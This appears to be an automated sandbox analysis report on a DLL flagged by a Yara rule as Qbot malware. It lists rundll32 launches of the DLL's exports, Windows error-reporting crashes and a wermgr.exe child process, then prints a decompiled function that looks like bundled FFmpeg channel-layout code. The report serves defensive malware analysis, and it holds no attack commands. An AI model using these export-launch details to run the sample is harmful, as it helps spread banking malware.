Start time:	01:59:09
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 2752, Parent PID: 684

General

Target ID:	9
Start time:	01:59:09
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7092, Parent PID: 7012

General

Target ID:	10
Start time:	01:59:12
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6716, Parent PID: 7012

General

Target ID:	11
Start time:	01:59:15
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4400, Parent PID: 6716

General

Target ID:	13
Start time:	01:59:15
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6712, Parent PID: 7012

General

Target ID:	14
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5728, Parent PID: 7012

General

Target ID:	15
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7044, Parent PID: 7012

General

Target ID:	16
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5500, Parent PID: 7012

General

Target ID:	18
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",next
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5920, Parent PID: 7012

General

Target ID:	19
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3308, Parent PID: 7012

General

Target ID:	21
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7016, Parent PID: 6712

General

Target ID:	22
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7060, Parent PID: 7044

General

Target ID:	23
Start time:	01:59:18
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 5752, Parent PID: 5500

General

Target ID:	24
Start time:	01:59:22
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x1070000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 684, Parent PID: 7012COMMON

Non-executed Functions

Function 1000D4D0 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 306
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
				char _t142;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				char _t160;
				signed int _t163;
				signed int _t166;
				unsigned int _t178;
				signed int _t182;
				char* _t191;
				char _t192;
				char* _t206;
				void* _t211;
				unsigned int _t227;
				intOrPtr _t238;
				intOrPtr _t241;
				signed int _t243;
				signed int _t250;
				signed int _t272;
				intOrPtr _t273;
				char* _t280;
				unsigned int _t284;
				intOrPtr _t285;
				signed int _t289;
				signed int _t292;
				void* _t293;
				char* _t329;
				unsigned int _t330;
				unsigned int _t332;
				signed int _t333;
				signed int _t337;
				unsigned int _t341;
				unsigned int _t351;
				char* _t353;
				intOrPtr _t379;
				char* _t380;
				signed int _t381;
				signed int _t382;
				char* _t386;
				unsigned int _t387;
				signed int _t388;
				char* _t390;
				signed int _t395;
				void* _t397;
				signed int _t399;
				signed int _t402;
				void* _t403;
				char _t420;
				signed int _t421;
				char* _t423;
				signed int _t425;
				char* _t426;
				char* _t428;
				void* _t431;
				char** _t432;
				char** _t434;
				char** _t435;
				intOrPtr* _t438;
				void* _t440;

				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t432 = _t431 - 0x2c;
				_t423 = _t432[0x10];
				_t432[6] = _t432[0x11];
				_t142 =  *_t423;
				_t440 = _t142 - 2;
				if(_t440 == 0) {
					L60();
					if(_t432[6] >= 0) {
						goto L8;
					} else {
						goto L14;
					}
					goto L12;
				} else {
					if(_t440 > 0) {
						if(_t142 != 3) {
							_t144 = 0xffffffea;
							goto L12;
						} else {
							_t191 = _t432[6];
							_t434 =  &(_t432[0xb]);
							_t353 = _t423;
							_pop(_t273);
							_pop(_t403);
							_pop(_t389);
							_pop(_t427);
							_t428 = _t353;
							_t390 = _t191;
							_push(_t403);
							_push(_t273);
							_t435 = _t434 - 0x4c;
							_t192 =  *_t353;
							if(_t192 == 3) {
								_t206 = _t428[4];
								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
								goto L74;
							} else {
								_t332 = _t353[8];
								if(_t192 != 2) {
									_t435[5] = 0x29a;
									_t435[1] = 0;
									 *_t435 = 0;
									_t435[4] = "libavutil/channel_layout.c";
									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
									_t435[2] = "Assertion %s failed at %s:%d\n";
									E10026560();
									L100A06B8();
									_t438 = _t435 - 0x41c;
									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
									_t238 =  *((intOrPtr*)(_t438 + 0x424));
									_t379 =  *((intOrPtr*)(_t438 + 0x428));
									if(_t238 != 0 || _t379 == 0) {
										 *((intOrPtr*)(_t438 + 8)) = _t379;
										_t285 = _t438 + 0x10;
										 *((intOrPtr*)(_t438 + 4)) = _t238;
										 *_t438 = _t285;
										L100089A0();
										 *((intOrPtr*)(_t438 + 4)) = _t285;
										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
										_t241 = E1000D4D0(_t285, _t390, _t403);
										if(_t241 >= 0) {
											_t241 =  *((intOrPtr*)(_t438 + 0x14));
										}
									} else {
										_t241 = 0xffffffea;
									}
									return _t241;
								} else {
									_t420 = _t353[4];
									_t380 = 0;
									_t280 = 0xffffffff;
									if(_t420 > 0) {
										do {
											_t206 =  *_t332 - 0x400;
											if(_t206 > 0x3ff) {
												goto L67;
											} else {
												if(_t380 > 0) {
													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
														goto L72;
													} else {
														goto L66;
													}
												} else {
													if(_t206 > 0x3ff) {
														goto L67;
													} else {
														if(_t206 == _t380) {
															L66:
															_t280 = _t380;
															goto L67;
														} else {
															goto L72;
														}
													}
												}
											}
											goto L90;
											L67:
											_t380 =  &(_t380[1]);
											_t332 = _t332 + 0x18;
										} while (_t380 != _t420);
										L74:
										if(_t280 < 0) {
											goto L72;
										} else {
											asm("pxor xmm0, xmm0");
											asm("cvtsi2sd xmm0, ebx");
											asm("sqrtsd xmm0, xmm0");
											asm("cvttsd2si eax, xmm0");
											_t406 =  &(_t206[1]) *  &(_t206[1]);
											if(_t406 !=  &(_t280[1])) {
												goto L72;
											} else {
												_t435[2] = _t206;
												_t435[1] = "ambisonic %d";
												 *_t435 = _t390;
												L100089C0();
												_t329 = _t428[4];
												if(_t329 > _t406) {
													_t211 = 0;
													do {
														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
														_t211 = _t211 + 8;
													} while (_t211 < 0x18);
													if( *_t428 == 3) {
														_t330 = _t428[8];
														_t435[0xa] = 1;
														_t284 = _t428[0xc];
														_t435[0xc] = _t330;
														_t435[0xd] = _t284;
														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
														_t406 = _t227 >> 0x10;
														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
													} else {
														_t284 = 2;
														_t435[0xa] = 2;
														_t435[0xb] = _t329 - _t406;
														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
													}
													 *_t435 = _t390;
													_t435[2] = 1;
													_t435[1] = 0x2b;
													L10008D20();
													_t435[1] = _t390;
													 *_t435 =  &(_t435[0xa]);
													E1000D4D0(_t284, _t390, _t406);
												}
												return 0;
											}
										}
									} else {
										L72:
										return 0xffffffea;
									}
								}
							}
						}
					} else {
						if(_t142 == 0) {
							_t148 = _t423[4];
							goto L59;
						} else {
							_t421 = _t423[8];
							_t243 = 4;
							_t333 = 0;
							_t289 = _t423[0xc];
							_t381 = 0;
							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
								_t381 =  &(1[_t381]);
								if(_t381 == 0x1f) {
									L14:
									_t145 = _t423[4];
									if(_t145 != 0) {
										_t432[2] = _t145;
										_t432[1] = "%d channels (";
										 *_t432 = _t432[6];
										L100089C0();
										_t395 = _t423[4];
										if(_t395 > 0) {
											_t425 = 0;
											_t386 = _t423;
											goto L19;
											do {
												do {
													L19:
													if(_t425 >= _t395) {
														L57:
														_t432[1] = 0x100b1acf;
														 *_t432 = _t432[6];
														L100089C0();
														goto L24;
													} else {
														_t160 =  *_t386;
														if(_t160 == 2) {
															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
															_t250 = _t292 - 0x400;
															if(_t425 != 0) {
																_t432[4] = _t292;
																_t432[1] = 0x100b1acf;
																 *_t432 = _t432[6];
																L100089C0();
																_t292 = _t432[4];
															}
															if(_t250 > 0x3ff) {
																goto L53;
															} else {
																goto L51;
															}
														} else {
															if(_t160 == 3) {
																_t178 = _t386[8];
																_t432[4] = _t178;
																_t432[5] = _t386[0xc];
																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
																_t272 = _t425 - _t397;
																if(_t425 >= _t397) {
																	goto L32;
																} else {
																	_t250 = 0;
																	if(_t425 == 0) {
																		L51:
																		_t432[2] = _t250;
																		_t432[1] = "AMBI%d";
																		 *_t432 = _t432[6];
																		L100089C0();
																	} else {
																		_t250 = _t425;
																		_t432[1] = 0x100b1acf;
																		_t64 = _t425 + 0x400; // 0x401
																		_t432[4] = _t64;
																		 *_t432 = _t432[6];
																		L100089C0();
																		_t292 = _t432[4];
																		if(_t425 <= 0x3ff) {
																			goto L51;
																		} else {
																			goto L47;
																		}
																	}
																}
															} else {
																if(_t160 == 1) {
																	_t272 = _t425;
																	_t432[4] = _t386[8];
																	_t432[5] = _t386[0xc];
																	L32:
																	_t432[7] = _t425;
																	_t182 = _t432[4];
																	_t292 = 0;
																	_t351 = _t432[5];
																	_t426 = _t386;
																	do {
																		_t387 = _t351;
																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
																		_t388 = _t387 >> _t292;
																		if((_t292 & 0x00000020) != 0) {
																			_t399 = _t388;
																		}
																		if((_t399 & 0x00000001) == 0) {
																			goto L34;
																		} else {
																			_t49 = _t272 - 1; // 0x0
																			_t402 = _t49;
																			if(_t272 != 0) {
																				_t272 = _t402;
																				goto L34;
																			} else {
																				_t386 = _t426;
																				_t425 = _t432[7];
																				if(_t425 != 0) {
																					_t432[4] = _t292;
																					_t432[1] = 0x100b1acf;
																					 *_t432 = _t432[6];
																					L100089C0();
																					_t292 = _t432[4];
																					L53:
																					if(_t292 <= 0x28) {
																						goto L41;
																					} else {
																						if(_t292 != 0xffffffff) {
																							goto L47;
																						} else {
																							goto L24;
																						}
																					}
																				} else {
																					if(_t292 > 0x28) {
																						L47:
																						_t432[2] = _t292;
																						_t432[1] = "USR%d";
																						 *_t432 = _t432[6];
																						L100089C0();
																					} else {
																						L41:
																						_t163 =  *(0x100b2280 + _t292 * 8);
																						if(_t163 == 0) {
																							goto L47;
																						} else {
																							_t432[2] = _t163;
																							_t432[1] = "%s";
																							 *_t432 = _t432[6];
																							L100089C0();
																						}
																					}
																				}
																			}
																		}
																		goto L25;
																		L34:
																		_t292 =  &(1[_t292]);
																	} while (_t292 != 0x40);
																	_t386 = _t426;
																	_t425 = _t432[7];
																	if(_t425 == 0) {
																		goto L24;
																	} else {
																		goto L57;
																	}
																	goto L29;
																} else {
																	if(_t425 != 0) {
																		goto L57;
																	}
																	L24:
																	_t432[1] = "NONE";
																	 *_t432 = _t432[6];
																	L100089C0();
																}
															}
														}
													}
													L25:
													if( *_t386 != 2) {
														goto L18;
													} else {
														_t341 = _t386[8];
														_t166 = _t425 + _t425 * 2;
														_t293 = _t341 + _t166 * 8;
														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
															goto L18;
														} else {
															goto L27;
														}
													}
													goto L29;
													L27:
													_t425 =  &(1[_t425]);
													_t432[2] = _t293 + 4;
													_t432[1] = "@%s";
													 *_t432 = _t432[6];
													L100089C0();
													_t395 = _t386[4];
												} while (_t395 > _t425);
												goto L29;
												L18:
												_t395 = _t386[4];
												_t425 =  &(1[_t425]);
											} while (_t395 > _t425);
										}
										L29:
										if(_t395 == 0) {
											goto L15;
										} else {
											_t432[1] = 0x100b1ad1;
											 *_t432 = _t432[6];
											L100089C0();
											_t144 = 0;
										}
									} else {
										L15:
										_t148 = 0;
										L59:
										_t432[2] = _t148;
										_t432[1] = "%d channels";
										 *_t432 = _t432[6];
										L100089C0();
										_t144 = 0;
									}
								} else {
									_t337 = _t381 << 5;
									_t6 = _t337 + 0x100b1c90; // 0x0
									_t243 =  *_t6;
									_t7 = _t337 + 0x100b1c94; // 0x0
									_t333 =  *_t7;
									continue;
								}
								goto L12;
							}
							_t382 = _t381 << 5;
							_t432[1] = "%s";
							_t9 = _t382 + 0x100b1c80; // 0x100b1abb
							_t432[2] =  *_t9;
							 *_t432 = _t432[6];
							L100089C0();
							L8:
							_t144 = 0;
						}
						L12:
						return _t144;
					}
				}
				L90:
			}

0x1000d4d1
0x1000d4d2
0x1000d4d3
0x1000d4d4
0x1000d4db
0x1000d4df
0x1000d4e3
0x1000d4e6
0x1000d4e9
0x1000d586
0x1000d58d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d4ef
0x1000d4ef
0x1000d55b
0x1000d570
0x00000000
0x1000d55d
0x1000d55d
0x1000d561
0x1000d564
0x1000d566
0x1000d567
0x1000d568
0x1000d569
0x1000d911
0x1000d914
0x1000d916
0x1000d917
0x1000d918
0x1000d91b
0x1000d920
0x1000da10
0x1000da15
0x00000000
0x1000d922
0x1000d925
0x1000d928
0x1000db65
0x1000db6f
0x1000db73
0x1000db76
0x1000db7e
0x1000db86
0x1000db8e
0x1000db93
0x1000dba0
0x1000dba6
0x1000dbad
0x1000dbb4
0x1000dbbd
0x1000dbc3
0x1000dbc7
0x1000dbcb
0x1000dbcf
0x1000dbd2
0x1000dbde
0x1000dbe2
0x1000dbe5
0x1000dbec
0x1000dbee
0x1000dbee
0x1000dc00
0x1000dc00
0x1000dc00
0x1000dbff
0x1000d92e
0x1000d92e
0x1000d931
0x1000d933
0x1000d93a
0x1000d963
0x1000d965
0x1000d96f
0x00000000
0x1000d971
0x1000d973
0x1000d94f
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d975
0x1000d97a
0x00000000
0x1000d97c
0x1000d980
0x1000d955
0x1000d955
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d980
0x1000d97a
0x1000d973
0x00000000
0x1000d957
0x1000d957
0x1000d958
0x1000d95b
0x1000da17
0x1000da19
0x00000000
0x1000da1f
0x1000da1f
0x1000da23
0x1000da27
0x1000da2b
0x1000da33
0x1000da38
0x00000000
0x1000da3e
0x1000da3e
0x1000da47
0x1000da4b
0x1000da4e
0x1000da53
0x1000da58
0x1000da5c
0x1000da5e
0x1000da5e
0x1000da62
0x1000da66
0x1000da69
0x1000da72
0x1000dac8
0x1000dad0
0x1000dad4
0x1000dad7
0x1000dadf
0x1000db44
0x1000db4f
0x1000db5c
0x1000da74
0x1000da7a
0x1000da7f
0x1000da85
0x1000da8c
0x1000da8c
0x1000da90
0x1000da9d
0x1000daa1
0x1000daa5
0x1000daae
0x1000dab2
0x1000dab5
0x1000dab5
0x1000dac3
0x1000dac3
0x1000da38
